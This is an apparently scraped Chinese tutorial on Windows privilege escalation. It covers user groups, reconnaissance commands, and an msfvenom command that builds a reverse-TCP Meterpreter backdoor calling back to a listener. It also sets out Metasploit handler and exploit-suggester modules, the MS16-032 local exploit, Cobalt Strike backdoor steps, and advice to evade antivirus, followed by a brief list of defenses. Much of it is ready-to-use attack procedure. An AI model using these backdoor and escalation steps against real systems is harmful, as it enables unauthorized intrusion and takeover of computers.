Windows权限提升技术详解<\/h1>

一、Windows权限基础<\/h2>

1.1 默认用户组权限<\/h3>

Windows系统内置了多个本地用户组，每个组拥有不同的权限：<\/p>

管理员组(Administrators)<\/strong>：拥有大部分计算机操作权限，能修改系统设置和所有文件<\/li>
高权限用户组(Power Users)<\/strong>：能执行大部分操作，但不能修改系统设置<\/li>
普通用户组(Users)<\/strong>：受限在自己的用户空间，不能处理其他用户文件<\/li>
备份操作组(Backup Operators)<\/strong>：用于系统维护<\/li>
文件复制组(Replicator)<\/strong>：用于系统维护<\/li>
来宾用户组(Guests)<\/strong>：文件操作权限同Users组，程序执行权限更少<\/li>

身份验证用户组(Authenticated users)<\/strong>：所有通过验证登录的用户<\/li> <\/ol>
1.2 特殊权限成员<\/h3>

SYSTEM<\/strong>：系统账户，拥有完全访问权<\/li>
Trustedinstaller<\/strong>：信任程序模块账户<\/li>
Everyone<\/strong>：所有人，权限类似Users组<\/li>
CREATOR OWNER<\/strong>：文件创建者专有权限<\/li> <\/ol>
二、权限获取方法分类<\/h2>

后台权限<\/strong>：SQL注入、数据库备份泄露、默认\/弱口令<\/li>
网站权限<\/strong>：后台提升、RCE漏洞、文件操作类漏洞、反序列化漏洞<\/li>
数据库权限<\/strong>：SQL注入、备份泄露、弱口令、从网站权限转入<\/li>
接口权限<\/strong>：SQL注入、源码泄漏、配置不当、从网站权限转入<\/li>
系统权限<\/strong>：高危系统漏洞、从网站\/数据库权限提升、第三方服务<\/li>
域控权限<\/strong>：高危漏洞、内网横向渗透、域控服务漏洞<\/li> <\/ol>
三、信息收集命令<\/h2>
systeminfo # 打印系统信息 <\/span><\/span>tasklist \/svc # 显示进程及服务 <\/span><\/span>whoami # 当前用户名 <\/span><\/span>whoami \/priv # 当前账户权限 <\/span><\/span>ipconfig # 网络配置 <\/span><\/span>ipconfig \/displaydns # DNS缓存 <\/span><\/span>route print # 路由表 <\/span><\/span>arp -a # ARP表 <\/span><\/span>hostname # 主机名 <\/span><\/span>net user # 列出用户 <\/span><\/span>net user UserName # 用户详细信息 <\/span><\/span>net use \\SMBPATH Pa <\/span><\/span>$$ <\/span><\/span>wOrd \/u:UserName # 连接SMB <\/span><\/span>net localgroup # 列出所有组 <\/span><\/span>net localgroup GROUP # 组详细信息 <\/span><\/span><\/code><\/pre>四、MSF自动化提权<\/h2> 4.1 生成后门<\/h3> msfvenom -p windows\/meterpreter\/reverse_tcp lhost=<\/span>监听端IP lport=<\/span>8888<\/span> -f exe -o shell.exe <\/span><\/span><\/code><\/pre>4.2 MSF监听设置<\/h3> use exploit\/multi\/handler <\/span><\/span>set payload windows\/meterpreter\/reverse_tcp <\/span><\/span>set lhost 0.0.0.0 <\/span><\/span>set lport 8888<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>4.3 提权方法<\/h3> 半自动化方式（根据补丁寻找漏洞）<\/h4> use post\/windows\/gather\/enum_patches <\/span><\/span>set session 1<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>全自动化方式（漏洞建议）<\/h4> use post\/multi\/recon\/local_exploit_suggester <\/span><\/span>set session 1<\/span> <\/span><\/span>set showdescription true <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>示例漏洞利用（MS16-032）<\/h4> use exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc <\/span><\/span>set session 1<\/span> <\/span><\/span>set lhost 0.0.0.0 <\/span><\/span>set lport 6666<\/span> <\/span><\/span>exploit <\/span><\/span><\/code><\/pre>五、Cobalt Strike插件化提权<\/h2> 创建监听器<\/li> 生成Windows可执行后门<\/li> 上传并执行后门<\/li> 在会话中设置延迟为0：sleep 0<\/code><\/li> 使用插件进行一键提权（可从GitHub获取相关插件）<\/li> <\/ol> 六、在线提权平台<\/h2> 将systeminfo<\/code>命令结果复制到在线提权平台（如Windows Exploit Suggester），取消勾选"远程代码执行"选项，分析可能的漏洞。<\/p> 七、注意事项<\/h2> 遇到杀毒软件需进行免杀处理<\/li> 信息收集阶段应判断是否存在杀毒软件<\/li> 权限可以叠加使用，不是覆盖关系<\/li> 管理员和SYSTEM可以忽略大多数文件访问限制（除非使用NTFS加密）<\/li> <\/ol> 八、防御建议<\/h2> 及时安装系统补丁<\/li> 使用强密码策略<\/li> 限制用户权限（遵循最小权限原则）<\/li> 部署杀毒软件和入侵检测系统<\/li> 监控异常进程和网络连接<\/li> 禁用不必要的服务和账户<\/li> <\/ol>